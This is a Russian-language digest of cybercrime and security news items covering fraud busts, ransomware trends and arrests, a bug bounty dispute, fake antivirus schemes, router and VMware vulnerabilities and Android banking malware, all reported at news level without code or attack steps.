Следователем СЧ ГСУ ГУ МВД России по Новосибирской области возбуждено уголовное дело по признакам преступления, предусмотренного ч. 2 ст. 159 Уголовного кодекса Российской Федерации. Фигурантам избрана мера пресечения в виде домашнего ареста.
В настоящее время полицейскими продолжается проведение комплекса оперативно- розыскных мероприятий, направленных на сбор доказательной базы, установление дополнительных фактов преступной деятельности и иных участников данной преступной группы.
Одна из самых влиятельных венчурных компаний Кремниевой долины с активами на сумму 42 миллиарда долларов [кинула](https://techcrunch.com/2024/07/18/researcher-finds-flaw- in-a16z-website-that-exposed-some-company-data) исследователя, отказавшись выплачивать вознаграждение за обнаружение ошибки в ее веб-приложении.
30 июня исследователь с ником xyzeva написала в X, что ищет представителя a16z с намерением обсудить проблему безопасности.
Как оказалось, xyzeva нашла действительно простую и одновременно серьезную ошибку, которая открывала доступ ко всему на портале компании a16z.
Проблема была связана с открытыми ключами API на сайте, которые позволяли потенциальному злоумышленнику завладеть адресами электронной почты и паролями, а также данными компании и сотрудников.
Кроме того, уязвимость позволяла отправлять электронные письма от имени a16z и получать доступ к ранее отправленным электронным письмам из учетной записи компании с помощью Mailgun.
Причем официально директор по ИБ Брайан Грин подтвердил официально: компания исправила ошибку в тот же день, когда xyzeva выкатила пост и связалась с компанией, заверив, что проблема не затронула какие-либо конфиденциальные данные.
Однако, когда речь зашла про вознаграждение, заявления компании о приверженности к сотрудничеству в вопросах этического раскрытия информации резко поменялось.
Для отказа в выплате в a16z нашли сразу два формальных подвода, упрекнув исследователя в огласке проблемы и ее неправильном описании.
Как говорится, ничего личного, просто бизнес.
"CYBERGÖZ-42" операции были проведены в 21 провинции на базе Анкары против лиц, совершивших преступление квалифицированного мошенничества под обещанием "Высоких прибылей при нулевом риске" через так называемую платформу покупки/продажи криптовалюты под названием "Smart Trade Coin".
127 подозреваемых, которые были найдены с несанкционированными доходами в 1 миллиард долларов, были задержаны.
Под руководством Генеральной дирекции безопасности, Центра борьбы с киберпреступлениями; В результате проведенных исследований Анкарским управлением полиции по борьбе с киберпреступностями; В провинциях Анкары Анталья, Стамбул, Измир, Эскишехир, Ушак, Айдын, Мугла, Кутахья, Чорум, Балыкесир, Денизли, Адана, Бурса, Малатья, Текирдаг за преступления "Квалифицированное мошенничество, Создание организации с целью совершения преступления и отмывание средств, полученных из преступления" В проведенных операциях в Испарте, Карабюк, Конья, Шырнак и Самсун; Граждан направляют инвестировать под обещанием "Высоких прибылей при нулевом риске" через так называемую платформу покупки/продажи криптовалюты "Smart Trade Coin", продается приложение-бот, которое выполняет автоматические сделки покупки- продажи, и "Понзи-цепь" предлагается существующим пользователям, обещая им прибыль, если они приведут новых пользователей. "127 подозреваемых, совершивших международное мошенничество, создав программу международного мошенничества, были арестованы."
В результате операций министр Йерликайя сообщил, что было изъято 177 недвижимых и 61 движимое имущество стоимостью 1 миллиард турецких лир, 1 нелицензированный пистолет, 1 пистолет с патроном и множество цифровых материалов.
FTC раскрыло схему антивирусных компаний, зарабатывающих на фиктивных заражениях.
Согласно [новому расследованию](https://www.404media.co/ftc-goes-undercover- against-fake-antivirus-companies/) 404 Media, Федеральная торговая комиссия США (Federal Trade Commission, FTC) [подала в суд](https://www.ftc.gov/news- events/news/press-releases/2024/03/tech-support-firms-will-pay-26-million- settle-ftc-charges-they-deceived-consumers-buying-repair?ref=404media.co) на две кипрские компании, обвинив их в распространении вредоносных всплывающих окон, которые обманным путем заставляли пользователей скачивать поддельное антивирусное ПО. По утверждениям FTC, мошенническая схема принесла операторам десятки миллионов долларов.
Согласно судебным документам, афера принесла организаторам десятки миллионов долларов. В рамках схемы мошенники также фальсифицировали результаты проверок VirusTotal, выдавая их за заражения на компьютерах жертв. В ответ на обвинения FTC компании Restoro и Reimage согласились выплатить $26 млн. в качестве урегулирования.
Согласно иску FTC, начиная с января 2018 года, обвиняемые вели мошенническую схему технической поддержки, заставляя потребителей, особенно пожилых людей, тратить миллионы долларов на ненужные услуги. FTC требует взыскать с компаний не только штрафы, но и наложить постоянный запрет на их деятельность.
Представленные FTC доказательства включают скриншоты всплывающих окон с
поддельными сообщениями о вирусах, стилизованными под системные уведомления
Windows, и призывами к срочному сканированию системы. Также было выявлено, что
компания Restoro использовала рекламу в Google для привлечения пользователей к
своему мошенническому сервису.
Поддельные уведомления о вирусах
В ходе расследования FTC купила услуги компаний под прикрытием, а также осуществила звонки в поддержку Reimage. Важным моментом стало то, что на компьютере, использованном для покупок и тестирования, была установлена антивирусная защита, что подчеркивает обманный характер предлагаемых услуг.
Мошенническое ПО после установки фиктивно «обнаруживало» проблемы безопасности, решение которых предлагалось за дополнительную плату в диапазоне от $27 до $58. Далее представители компаний предлагали еще более дорогие услуги, стоимость которых достигала сотен долларов. В процессе общения с техподдержкой пользователей убеждали в необходимости скачивания дополнительного ПО, позволяющего представителям получить доступ к компьютеру, демонстрируя при этом поддельные ошибки в журнале событий Windows.
Один из представителей во время звонка пытался напугать пользователя потенциальным ущербом от троянов и вирусов, предлагая дорогостоящие услуги по исправлению проблем за $200, $300 и даже $500. Кроме того, в ходе звонка представители использовали сайт VirusTotal для создания ложного впечатления о заражении компьютера, хотя на самом деле показывали результаты сканирования других машин.
Reimage уже сталкивалась с негативной реакцией на свои действия, включая предупреждения от Visa о мошенническом маркетинге. Ни одна из компаний, ни FTC не предоставили официальных комментариев по данному вопросу.
Средний размер выкупа в четвертом квартале 2021 года увеличился на 130% в сравнении с предыдущим кварталом.
Многочисленные операции правоохранительных органов, приведшие к арестам и нейтрализации вымогателей в 2021 году, вынудили злоумышленников сузить сферу своей деятельности и повысить эффективность своих вредоносных кампаний.
Большинство известных группировок, действующих по бизнес-модели «Вымогательское-ПО-как-услуга» (Ransomware-as-a-Service, RaaS) продолжают свою деятельность даже после того, как правоохранительные органы арестовали ключевых членов группировок. Как сообщили ИБ-эксперты из компании Coveware, в четвертом квартале 2021 года группы вымогателей стали требовать более высокие суммы выкупов.
Средний размер выкупа в четвертом квартале 2021 года достиг $322 168 — на 130% больше, чем в предыдущем квартале. Поскольку нарушение работы крупных фирм провоцирует расследования и создает политическую напряженность на международном уровне, хакеры действуют более осторожно. Они атакуют достаточно крупные фирмы с намерением получить огромные выкупы, но не настолько крупные, чтобы атака вызвала больше геополитических проблем, чем принесла выгоды.
«Хотя средние и крупные организации продолжают подвергаться атакам, программы- вымогатели остаются проблемой малого бизнеса — 82% атак затрагивают организации с менее чем тысячей сотрудников», — объясняет Coveware.
В четвертом квартале 2021 года наиболее часто встречающимся вариантом вымогателей был Conti, на который пришлось 19,4% всех обнаружений вымогателей, LockBit 2.0 занял второе место (16,3%), а Hive — третье месте (9,2%).
Установление персистентности с помощью запланированных задач и выполнение кода характерно для 82% заражений. В 82% случав операторы вымогателей перемещались по сетям жертвы, пытаясь перейти к большему количеству устройств. Доступ к учетным данным был зафиксирован в 71% наблюдаемых случаев атак с использованием программ-вымогателей. В 63% инцидентов использовался командный центр для организации операций удаленного доступа.
Хищение данных, включая ввод с клавиатуры, снимки экрана, электронные письма, видео и другую информацию, связанную со шпионажем, характерно для 61% случаев атак.
Еще одно заметное изменение в тактике касается исходного вектора компрометации. Доступ по протоколу RDP, который раньше был предметом широкого обмена на рынках даркнета, неуклонно сокращается, поскольку злоумышленники начинают использовать уязвимости. Наиболее часто используемыми уязвимостями для проникновения в сеть жертвы в четвертом квартале 2021 года были CVE-2021-34473 , CVE-2021-26855 в Microsoft Exchange и CVE-2018-13379 в межсетевых экранах Fortinet.
source: coveware.com/blog/2022/2/2/law-enforcement-pressure-forces-ransomware- groups-to-refine-tactics-in-q4-2021
277 тыс. маршрутизаторов уязвимы к атакам UPnProxy через UPnP
Хакеры предположительно эксплуатируют уязвимости EternalBlue и EternalRed на системах под управлением Windows и Linux.
Киберпреступники в ходе вредоносной кампании под названием Eternal Silence используют набор сетевых протоколов Universal Plug and Play (UPnP), превращая маршрутизаторы в прокси-серверы для запуска вредоносных атак.
UPnP — протокол подключения, опционально доступный в большинстве современных маршрутизаторов, который позволяет другим устройствам в сети автоматически создавать правила переадресации портов на маршрутизаторе. Это позволяет удаленным устройствам получать доступ к определенной программной функции или устройству по мере необходимости с небольшой настройкой, требуемой пользователем.
Реализация UPnP потенциально уязвима к атакам, позволяющим удаленным хакерам добавлять записи переадресации портов UPnP через открытое WAN-соединение устройства.
Исследователи из компании Akamai обнаружили киберпреступников, использующих данную уязвимость для создания прокси-серверов, скрывающих свои вредоносные операции. Атака получила название UPnProxy.
Как предполагают эксперты, злоумышленники эксплуатируют уязвимости EternalBlue (CVE-2017-0144) и EternalRed ( CVE-2017-7494 ) на системах под управлением Windows и Linux соответственно. Использование этих проблем позволяет устанавливать криптомайнеры, осуществлять червеподобные атаки, которые быстро распространяются на целые корпоративные сети, или устанавливать первоначальный доступ к корпоративным сетям.
Из 3,5 млн UPnP-маршрутизаторов, обнаруженных специалистами в Сети, 277 тыс. уязвимы к атакам UPnProxy, а 45113 из них уже скомпрометированы хакерами.
Лучший способ определить скомпрометированное устройство — просканировать все оконечные точки и проверить записи в таблице NAT. Эксперты предоставили bash- скрипт, который можно запустить для потенциально уязвимого URL-адреса. Отключение UPnP не очистит внедренные команды хакеров. Вместо этого пользователям потребуется перезагрузить или переустановить прошивку устройства.
Студент-медик из Бразилии обратился в суд с иском против криптовалютной биржи Binance, пожаловавшись на потерю всех средств на счету в ходе взлома его аккаунта.
Взлом произошел в 2021 году. В один из дней владелец счета зашел в свой аккаунт и не увидел средств на счету. Оказалось, его биткоины похитили неизвестные мошенники.
В аккаунте была информация, что в его учетную запись заходили минимум с четырех разных IP-адресов перед тем, как были сняты средства. Все IP были других стран. В своем иске пострадавший указал, что не покидал пределов Бразилии.
В ответ на иск, служба поддержки Binance отметила, что пользователь не использовал двухфакторную аутентификацию и не подтвердил емейл. Это способствовало взлому учетной записи.
Однако, невзирая на официальную позицию биржи бразильский суд вынес решение в пользу истца. 31 января 2022 года суд приказал Binance вернуть украденные средства на баланс истца, но освободил от уплаты штрафа за моральный ущерб. Также биржа BINANCE должна оплатить судебные издержки в размере 1000 реалов.
Американские правоохранители арестовали и предъявили обвинения гражданину Италии, который более пяти лет занимался фишингом. Обвиняемый выдавал себя за представителя издательского бизнеса и похищал у жертв рукописи неопубликованных книг.
29-летний Филиппо Бернардини (Filippo Bernardini), гражданин Италии, проживающий и работающий в Лондоне, был арестован в аэропорту имени Джона Кеннеди в Нью-Йорке на прошлой неделе.
Согласно судебным документам, с августа 2016 года он зарегистрировал более 160 доменов с именами, похожими на настоящие названия литературных агентств, издательств и так далее. После этого подозреваемый создал email-адреса для этих доменов, имитировавшие ящики реальных людей, которые работают в вымышленных компаниях.
«Мы считаем, что мистер Бернардини использовал инсайдерские знания об этой отрасли, чтобы обманом заставить авторов присылать ему свои неопубликованные книги и тексты, выдавая себя за литературных агентов и издательства», — рассказывают представители ФБР.
Хотя крупных утечек в результате действий Бернардини не случилось, в книжной индустрии давно знали об этих фишинговых атаках и хищениях рукописей, а несколько книгоиздателей даже предприняли меры, чтобы не стать жертвами подобных инцидентов. [В статье Vulture](https://www.vulture.com/2021/08/stealing-books-before-release- mystery.html) от августа 2021 года немецкий книжный правообладатель и вовсе предполагал, что за кражами может стоять некая компания, занимающаяся кибербезопасностью, которая похищает тексты под прикрытием продажи защитного ПО.
Согласно публикациям [BBC](https://www.bbc.com/news/entertainment- arts-59893035), [The Guardian](https://www.theguardian.com/books/2022/jan/06/literary-mystery-may- finally-be-solved-as-man-arrested-for-allegedly-stealing-unpublished-books) и [New York Times](https://www.nytimes.com/2022/01/05/books/publishing- manuscripts-phishing-scam-filippo-bernardini.html), Бернардини успешно похитил рукописи и другие тексты у таких авторов, как Маргарет Этвуд, Стиг Ларссон, Салли Руни и актер Итан Хоук. СМИ пристально следили за происходящим многие годы, так как от рук фишера пострадали в том числе их собственные репортеры.
Бернардини предъявлены обвинения в мошенничестве с использованием электронных средств связи и краже личных данных при отягчающих обстоятельствах. Если его вина будет доказана, ему грозит более 20 лет лишения свободы.
• Source: justice[.]gov/usao-sdny/pr/italian-citizen-arrested-online- impersonation-scheme-fraudulently-obtain-prepublication
• Source: justice[.]gov/usao-sdny/press-release/file/1460766/download
Код банковского трояна Ares еще находится на ранних стадиях разработки.
Создатель банковского трояна Osiris прекратил свою деятельность в марте нынешнего года, сославшись на отсутствие интереса к троянам в киберпреступной сфере. В течение последних трех лет разработчик, использующий псевдоним Anubi, предоставлял доступ к трояну группам киберпреступников.
Но как раз в то время, когда Anubi объявил о прекращении своей деятельности, ИБ-эксперты из фирмы Zscaler [обнаружили](https://www.zscaler.com/blogs/security-research/ares-malware- grandson-kronos-banking-trojan) новый банковский троян под названием Ares, разработанный на основе старой кодовой базы Kronos и имеющий сходство с трояном Osiris. В настоящее время неясно, участвовал ли Anubi в создании трояна или он передал кодовую базу новому разработчику.
По мнению экспертов, связь между тремя видами вредоносных программ более чем очевидна, хотя код Ares находится на ранних стадиях разработки. Код содержит несколько ошибок и сегментов кода, на которые нет ссылок. Предположительно, они используются для отладки.
Osiris, представляющий собой обновленную и улучшенную версию вредоносного ПО Kronos, заражал компьютеры под управлением Windows и внедрял вредоносный код в web-браузеры для кражи учетных данных электронного банкинга и изменения банковских транзакций. Вредонос использовал продвинутые руткиты для сохранения персистентности на зараженных системах, а также мог красть учетные данные из нескольких локальных приложений и отправлял их на C&C-сервер.
Банковский троян стал все меньше и меньше использоваться среди киберпреступных групп. Последняя крупная спам-кампания, распространяющая версию трояна Osiris, была зафиксирована в январе нынешнего года и нацелена на пользователей из Германии.
Патрик Уордл (Patrick Wardle), один из ведущих специалистов в мире по безопасности продуктов Apple, обнаружил модификацию малвари Pirrit, предназначенную для работы на чипе M1.
Чипы Apple M1 были представлены в ноябре 2020 года, и с тех пор многие разработчики подготовили новые версии своих приложений, чтобы обеспечить лучшую производительность и совместимость. Уорл пишет, что теперь аналогичные шаги предпринимают и авторы малвари, адаптируя своих вредоносов для Apple M1.
В статье эксперт детально описывает рекламную малварь GoSearch22, замаскированную под расширение для Safari. Оно собирает данные о просмотренных пользователем сайтах, а также показывает огромное количество рекламы, включая баннеры и всплывающие окна, которые ссылаются на подозрительные сайты, распространяющие малварь. Изначально этот «продукт» был написан для работы на Intel x86, но с тех пор его портировали на чипы M1 на базе ARM.
Хотя устройства на базе M1 могут запускать ПО, ориентированное на x86 (с помощью Rosetta), нативная поддержка M1 означает не только повышение эффективности, но также дает злоумышленникам больше шансов остаться незамеченными.
Согласно образцу, загруженному на VirusTotal 27 декабря 2020 года, мошенническое расширение представляет собой вариацию рекламного вредоноса Pirrit, который впервые был обнаружен еще в 2016 году. Новая модификация, судя по всему, появилась в ноябре прошлого года.

«Сегодня мы убедились в том, что злоумышленники действительно создают мультиархитектурные приложения, код которых будет работать в системах M1. Вредоносное приложение GoSearch22 может быть первым примером такой нативной совместимости с M1», — пишет Уордл.
Click to expand...
Исследователь отмечает, что в ноябре 2020 года расширение было подписано Apple Developer ID некоего hongsheng_yan, чтобы скрыть вредоносный контент. Но с тех пор подпись была отозвана, а значит, злоумышленникам придется переподписать малварь другим сертификатом, чтобы она продолжила работать.

Источник: xakep.ru/2021/02/20/gosearch22/
В Краснодаре сотрудники Бюро специальных технических мероприятий МВД России совместно с оперативниками УУР краевого Главка полиции в ходе оперативного сопровождения уголовного дела, возбуждённого по статье 159 Уголовного кодекса Российской Федерации, выявили и ликвидировали так называемый узел связи, который дистанционно использовался мошенниками из-за рубежа для подмены своих номеров телефонов при массовых обзвонах жителей разных регионов России с целью хищения у них денег.
Как установили полицейские, 41-летний приезжий из Ульяновской области по указанию кураторов из стран ближнего зарубежья арендовал в Краснодаре квартиру, где установил специальное оборудование. Мужчина получал по мессенджеру сообщения от подельников, согласно которым переставлял для аферистов SIM-карты в двух администрируемых SIM-боксах.
Оперативники задержали сообщника мошенников и провели обыск в арендуемом им жилом помещении, откуда изъяли вышеуказанное оборудование, а также два ноутбука, мобильные телефоны и более тысячи SIM-карт различных операторов сотовой связи. Назначено проведение экспертиз и исследований.
В настоящее время проводится комплекс оперативно-розыскных мероприятий и следственных действий, направленных на выявление и документирование всех фактов противоправной деятельности задержанного злоумышленника, а также установление и поимку его сообщников.
• Video: https://rutube.ru/video/69b791f18ce96643ab54362b3efad9ef/?r=plemwd
Национальная полиция Испании предупредила клиентов различных онлайн-платформ, например, Amazon, об опасности потери личных данных после выброса коробки от товара в мусорное ведро. Отмечается, что речь идет о таких случаях, как если пользователь сначала получил посылку, открыл её, достал новый телефон или ноутбук и потом выбросил коробку в мусорное ведро.
В материале правоохранительных структур указывается, что через день после того, как этот мусор оказался в уличном контейнере, клиент получает подозрительное письмо якобы от Amazon. В нем содержится уведомление, что ноутбук или телефон имеет существенные технические проблемы и необходимо срочно его вернуть. При этом запрашивается еще и номер банковской карты, с которой совершалась покупка, для возмещения полной стоимости товара.
Однако, в полиции заявили, что это вовсе не Amazon, а обычные мошенники, которые получили информацию с наклейки той коробки, которую выбросил клиент интернет-платформы. Сообщается, что уже несколько тысяч испанцев попались в эту ловушку.
Данное явление называют «погружением в мусорный контейнер». Оно представляет собой распространенный вид мошенничества, когда преступники буквально копаются в мусоре с целью найти конфиденциальную информацию. Впоследствии они задействуют ее для обмана, выполнения кибератак или получения доступа к частным сетям.
Известно, что наклейку с коробки Amazon, а также флэш-накопитель с важными документами, медицинские записи или счета, пароли, коммерческие данные, можно обнаружить в куче бытовых отходов. Для защиты от потери своих данных рекомендуется уничтожать все документы и упаковки с персональной информацией перед тем, как выбрасывать их в общий уличный контейнер.
Компания VMware призывает клиентов как можно скорее устранить критические уязвимости, позволяющие обойти защиту и осуществить побег из песочницы во всех версиях VMware ESXi, Workstation, Fusion и Cloud Foundation.
Проблемы затрагивают все версии и настолько серьезны, что патчи выпущены даже продуктов, поддержка которых уже была прекращена.
Дело в том, что свежие уязвимости позволяют получить несанкционированный доступ к хост-системе, на которой установлен гипервизор, или получить доступ к другим виртуальным машинам, работающим на том же хосте.
Уязвимости получили идентификаторы CVE-2024-22252, CVE-2024-22253, CVE-2024-22254 и CVE-2024-22255 (от 7,1 до 9,3 балла по шкале CVSS), и все они имеют статус критических.

Для защиты от CVE-2024-22252, CVE-2024-22253 и CVE-2024-22255 можно временно
удалить USB-контроллеры из виртуальных машин, следуя этой инструкции.
Подчеркивается, что это может повлиять на подключение клавиатур, мышей и USB-
накопителей в некоторых конфигурациях.
Также стоит отметить, что VMware выпустила патчи даже для устаревших версий ESXi (6.7U3u), 6.5 (6.5U3v) и VCF 3.x в связи с серьезностью обнаруженных проблем.
В Сингапуре недавно была проведена успешная полицейская операция, в результате которой было задержано 13 человек, подозреваемых в причастности к банковскому мошенничеству. Среди задержанных также оказался 16-летний подросток и несколько молодых девушек.
Как сообщается, задержанные соучастники мошеннической операции предоставляли матёрым злоумышленникам свои банковские счета, учётные данные для интернет- банкинга и учётные данные Singpass за денежное вознаграждение. Эти счета и аккаунты использовались для перенаправления украденных денег и их своеобразного отмывания. Часть группы также была задействована в обналичке полученных средств. Точное количество жертв мошенников пока неизвестно.
В пресс-релизе , опубликованном первого июля, Сингапурская полиция сообщила, что с января этого года получала всё больше сообщений о злоумышленниках, которые проводят несанкционированные транзакции с банковских счетов жертв. Особенно примечательно было то, что пострадавшие ни с кем не делились своими учётными данными от интернет-банкинга, Singpass и никому не сообщали одноразовые пароли из СМС. Как же тогда мошенники смогли так долго проворачивать свои мутные схемы?
Как оказалось, злоумышленники использовали вредоносное ПО для компрометации Android-смартфонов. Начальным этапом заражения являлся отклик жертвы на различные объявления о таких услугах, как уборка помещений, стрижка животных или продажа продуктов питания.
Впоследствии мошенники инструктировали жертв загрузить специальное приложение из неофициального источника для удобства покупки услуг и получения дополнительных привилегий. Однако, разумеется, загруженный apk-файл содержал вредоносный код.
После первоначального заражения злоумышленники дополнительно связывались с жертвами по телефону или через текстовые сообщения, убеждая дать вредоносному приложению доступ к службам специальных возможностей на своих смартфонах. Их активация давала злоумышленникам практически полный контроль над устройствами своих жертв: логирование нажатых клавиш, кража банковских учётных данных, удалённое управление и т.п.
Полиция обнаружила, что хакеры также пользовались банковскими счетами взломанных пользователей как транзитным пунктом для отмывания средств, выполняя переводы между десятками счетов без ведома жертв. Мошенники также удалённо уничтожали любые текстовые сообщения и электронные уведомления, связанные с мошенническими переводами, чтобы замести все следы атаки.
Полиция Сингапура предупреждает: не стоит переходить по подозрительным ссылкам, сканировать неизвестные QR-коды и тем более загружать приложения из ненадёжных источников. Вредоносные программы могут навредить вашему устройству, персональным данным и кошельку. Загружать любые приложения следует только из официальных источников, дополнительно проверяя отзывы других пользователей перед установкой, а также запрашиваемые разрешения после неё.
• Source: [https://www.police.gov.sg/media- roo...lvement_in_banking_related_malware_scam_cases](https://www.police.gov.sg/media- room/news/20230701_13_arrested_for_suspected_involvement_in_banking_related_malware_scam_cases)
В результате нелегальной деятельности мужчина «заработал» более 14,5 млн рублей.
Сотрудниками Управления экономической безопасности и противодействия коррупции совместно с сотрудниками Управления по контролю за оборотом наркотиков Министерства внутренних дел по Луганской Народной Республике в ходе проверки информации в рамках уголовного дела была выявлена и задокументирована незаконная деятельность гражданина 1981 г.р., связанная с обналичиваем и переводом денежных средств, а также куплей-продажей иностранной валюты.
Указанную деятельность мужчина осуществлял на дому по месту жительства без
каких-либо уставных документов и разрешений на указанный вид
предпринимательской деятельности.
В ходе обыска сотрудниками полиции были обнаружены и изъяты банковские карты,
мобильные телефоны, квитанции, черновые записи осуществляемых валютных
операций и денежные средства, предназначавшиеся для проведения валютных
операций (евро, доллары, гривны и рубли).
Из компьютера мужчины извлечена информация о денежных переводах со счетов онлайн-банков, электронных платежных систем и криптовалютных счетов.
Установлено, что в результате незаконной деятельности мужчина извлек доход в сумме более 14,5 млн рублей.
Главным следственным управление МВД по Луганской Народной Республике возбуждено уголовное дело по признакам состава преступления, предусмотренного ст.172 УК РФ «Незаконная банковская деятельность». Ведется следствие.
Мужчина хотел лёгких денег, но легко получить сумел лишь обвинение в мошенничестве.
28-летний житель графства Хартфордшир Эшли Лайлз признался в получении несанкционированного доступа к корпоративным компьютерам со злым умыслом, а также в шантаже своего работодателя.
Как сообщается, в феврале 2018 года Лайлз работал аналитиком по информационной безопасности в компании из Оксфорда, которая тогда подверглась атаке вымогательского программного обеспечения. Злоумышленники, как и во многих подобных случаях, потребовали от руководства компании выплатить выкуп.
Лайлз участвовал во внутреннем расследовании и ликвидации последствий атаки, с чем также помогали другие сотрудники компании и полиция. Однако Лайлз попытался извлечь личную выгоду из той атаки, заменив платёжные реквизиты злоумышленников на свои собственные, чтобы компания перевела деньги самому Лайлзу.
«Он получил доступ к личным электронным письмам члена совета директоров более 300 раз, а также изменил оригинальное шантажное письмо и изменил адрес для оплаты, предоставленный первоначальным нападавшим», — объяснили в SEROCU.
«Лайлз также создал почти идентичный адрес электронной почты оригинального нападавшего и начал отправлять электронные письма своему работодателю, чтобы давить на него и заставить заплатить деньги», — добавили правоохранители.
Однако владелец компании не был заинтересован в выплате злоумышленникам, а продолжавшиеся в это время внутренние расследования выявили несанкционированный доступ к личным письмам компании, указывающий на IP-адрес дома Лайлза.
Хотя мужчина понял, что расследование приближается к нему, и стёр все данные со своих личных устройств, когда правоохранители ворвались в его дом для изъятия компьютера, было всё же возможно восстановить обличающие данные. Конечно, Лайлз долгое время отрицал своё участие, но через пять лет он всё же признался в содеянном на слушании в суде города Рединг. 11 июля 2023 года бывший сотрудник вернётся в суд, чтобы услышать свой окончательный приговор.
Согласно законодательству Великобритании, несанкционированный доступ к компьютерам карается до двух лет тюремного заключения, а шантаж — максимальным сроком до 14 лет.
source: serocu.police.uk/man-convicted-of-blackmail-and-other-offences
Банкиры использовали счета компаний-однодневок для нелегального обналичивания денег
Сотрудники МВД пресекли деятельность теневых банкиров в Москве, которые обвиняются в незаконной банковской деятельности на 132 млн рублей. Об этом ТАСС сообщила официальный представитель МВД России Ирина Волк.
По ее словам, оперативники установили, что злоумышленники организовали финансовую структуру, аналогичную банковской, и применяли ее для нелегального обналичивания денег. Соучастники использовали счета порядка 200 подконтрольных компаний-однодневок, зарегистрированных в различных регионах России. Деньги клиентов они выводили в теневой оборот под видом осуществления оптово- розничной торговли табачными изделиями, строительными материалами и прочим оборудованием. "За свои услуги сообщники получали вознаграждение в размере не менее 13% от каждой транзакции, обналичив в общей сложности свыше 132 млн рублей", - сказала Волк.
По данному факту возбуждено уголовное дело (ч. 2. ст. 172 УК РФ). "Оперуполномоченными изобличены организаторы противоправной деятельности - 33-летний мужчина и его сообщница, которая осуществляла бухгалтерское обслуживание используемых для махинаций компаний. В настоящее время им предъявлены обвинения в инкриминируемых деяниях", - добавила представитель ведомства. Им избрана мера пресечения в виде подписки о невыезде.
В ходе обысков в офисе организации и по адресам проживания обвиняемых изъяты электронные носители информации, штампы фиктивных фирм, а также поддельные печати различных кредитных и государственных учреждений, электронно-цифровые подписи руководителей обществ, ключи от системы "Банк клиент", флеш- накопители, банковские карты и другие предметы, имеющие доказательственное значение для уголовного дела.
Представители Европола [объявили](https://www.europol.europa.eu/newsroom/news/12-targeted-for- involvement-in-ransomware-attacks-against-critical-infrastructure) об аресте 12 человек, которые связаны с более чем с 1800 вымогательскими атаками в 71 стране мира. Сообщается, что подозреваемые были операторами шифровальщиков LockerGoga, MegaCortex и Dharma.
Аресты прошли в начале текущей недели, 26 октября, в Украине и Швейцарии. В результате проведенных одновременно рейдов полиция изъяла пять роскошных автомобилей, электронные устройства и 52 000 долларов наличными. В расследовании также принимали участие правоохранительные органы правоохранительные органы Норвегии, Франции, Великобритании, Германии, Нидерландов и США.
По информации Европола, 12 подозреваемых входили в состав профессиональной преступной группы и атаковали крупные компании с помощью шифровальщиков с 2019 года.
«Большинство подозреваемых считаются важными целями, потому что они проходят по множеству громких дел в разных юрисдикциях, — гласит пресс-релиз Европола. — Некоторые из этих преступников занимались “пентестами”, используя различные метода для компрометации ИТ-сетей, включая брутфорс- атаки, SQL-инъекции, ворованные учетные данные, а также фишинговые электронные письма с вредоносными вложениями».
Click to expand...
Проникнув в сеть целевой организации, хакеры не спешили и тратили долгие месяцы на поиск слабых мест, чтобы продвинуться дальше и расширить свой доступ. Группировка разворачивала в сетях пострадавших такую малварь, как TrickBot, а также использовала фреймворки для постэксплуатации, включая Cobalt Strike и PowerShell Empire.
Похоже, хакеры были партнерами сразу нескольких RaaS-платформ (Ransomware-as- a-Service), так как после они использовали в своих атаках различные семейства вымогателей, в том числе LockerGoga, MegaCortex и Dharma.
Кроме того, Европол сообщает, что некоторые из арестованных не занимались взломом, но помогали группе отмывать выкупы, полученные от жертв.
Согласно [пресс-релизу](https://www.politiet.no/nn/aktuelt-tall-og- fakta/aktuelt/nyheter/2021/10/29/kripos-del-av-stor-aksjon-mot-organiserte- digitale-kriminelle/) норвежской полиции, 12 подозреваемых были связаны с нашумевшей атакой на норвежскую компанию по производству алюминия Norsk Hydro, произошедшей в марте 2019 года. Напомню, что из-за этого инцидента работа компании на двух континентах была остановлена, а производство простаивало почти неделю.
«Более 50 иностранных следователей, в том числе шесть специалистов Европола, были направлены в Украину для оказания помощи Национальной полиции в проведении совместных следственных мероприятий. Офицер украинской киберполиции также был прикомандирован к Европолу на два месяца для подготовки к операции», — рассказывает Европол.
Click to expand...
Украинские правоохранители тоже подготовили собственный [пресс- релиз](https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla- transnaczionalne-zlochynne-ugrupovannya-u-nanesenni-inozemnym-kompaniyam-- miljoniv-dolariv-zbytkiv-4066/), в котором сообщают, что ущерб, нанесенный потерпевшим, достигает 120 млн долларов.
Источник: https://xakep.ru/2021/10/29/lockergoga-megacortex-dharma-arrests/
Каждый пятый россиянин хотел бы стать хакером, такие данные показал опрос международного разработчика антивирусных программ ESET, результаты которого 29 сентября есть в распоряжении «Известий».
Отмечается, что такая работа чаще интересует людей в возрасте от 18 до 24 лет. Больший интерес к указанной сфере деятельности проявляют мужчины, а не женщины. При этом 80% опрошенных признались, что не хотели бы быть хакерами.
«По большей части негативное отношение к хакерам — следствие информационного шума в новостях после громких взломов, кибератак или утечек данных. Но хакингом занимаются и добропорядочные законопослушные программисты. В ESET тоже трудятся такие специалисты — так называемые белые хакеры или хакеры в белых шляпах. Они ищут уязвимости в компьютерных системах и помогают в их отладке. Хочется верить, что упомянутые в исследовании 20% россиян хотят занять светлую сторону киберсилы», — прокомментировал итоги соцопроса директор департамента корпоративного бизнеса ESET Антон Пономарев.
Исследование показало, что 84% опрошенных считают, что понимают, чем занимаются хакеры. При этом 15% участвующих в опросе признались, что не догадываются о детальности хакеров.
Большинство россиян (53%) убеждены, что хакеры не могут приносить пользу обществу. Они считают их мошенниками. Мнения участников опроса о пользе деятельности хакеров разделились.
Хакеры, как считают 85% опрошенных, взламывают чужие сайты, также они могут воровать или удалять данные пользователей (72% ответов). О том, что хакеры могут помогать исправлять ошибки в коде или предотвращать потерю данных, респонденты вспоминают реже всего: в 18 и в 16% случаев соответственно.
• Source: <https://iz.ru/1228538/2021-09-29/opros-pokazal-zhelanie-rossiian- stat-khakerami>
Компьютерные мошенники нашли помощников в Литве - пойман бизнесмен, управляющий двумя компаниями в Вильнюсе, которого чиновники называют "денежным мулом" ( „pinigų mulą“ ). Этот человек, пойманный с помощью неопровержимых доказательств и имеющий две судимости, не скрывал, что получил на счет своей компании более 126 000 евро, которые ему не принадлежали.
Эту сумму вильнюсский предприниматель Тигран Шахпаронян ( Tigranas Šachparonianas ) должен будет вернуть зарегистрированному в Швейцарии фонду роста и инноваций BCI.
Таково решение Вильнюсского краевого суда, который признал Тиграна Шачпароняна виновным в мошенничестве. Кроме того, судьи постановили, что человек, помогавший мошенникам, которых он никогда не предавал, должен провести два года за решеткой.
